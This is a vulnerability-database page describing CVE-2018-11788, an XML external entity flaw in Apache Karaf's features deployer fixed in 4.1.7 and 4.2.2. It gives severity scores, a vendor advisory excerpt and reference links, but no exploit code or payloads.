Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
668
VMScore

CVE-2018-11788

Published: 07/01/2019 Updated: 12/02/2019
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Subscribe to Apache

Vulnerability Summary

Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version before 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache karaf 4.2.0

apache karaf

Vendor Advisories

Red Hat: CVE-2018-11788
Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder The features XML is parsed by XMLInputFactory class Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE This is a potential security risk as an user can inject external XM ...

Github Repositories

https://github.com/brianwrf/CVE-2018-11788

Apache Karaf XXE Vulnerability (CVE-2018-11788)

Summary Apache Karaf is a modern and polymorphic applications container It's a lightweight, powered, and enterprise ready container powered by OSGi Apache Karaf is a "product project", providing a complete and turnkey runtime The runtime is "multi-facets", meaning that you can deploy different kind of applications: OSGi or non OSGi, webapplication, s

https://github.com/brianwrf/TechArticles

A set of tech articles.

TechArticles A set of tech articles Table of Contents 渗透测试学习笔记之综合渗透案例一 谈一谈如何建设体系化的安全运营中心(SOC) 甲方安全建设的一些思路和思考 Apache Karaf XXE Vulnerability (CVE-2018-11788) Magento Unauthorized Remote Code Execution (CVE-2016-4010) Apache Tika Denial of Service Vulnerability (CVE-2018-11761)

References

CWE-611http://karaf.apache.org/security/cve-2018-11788.txthttp://www.securityfocus.com/bid/106479https://nvd.nist.govhttps://github.com/brianwrf/CVE-2018-11788https://access.redhat.com/security/cve/cve-2018-11788
VMScore
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-3675CVE-2024-3400CVE-2024-23557mass assignmentCVE-2023-1389local file inclusionCVE-2024-32596file uploadCVE-2024-32593
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook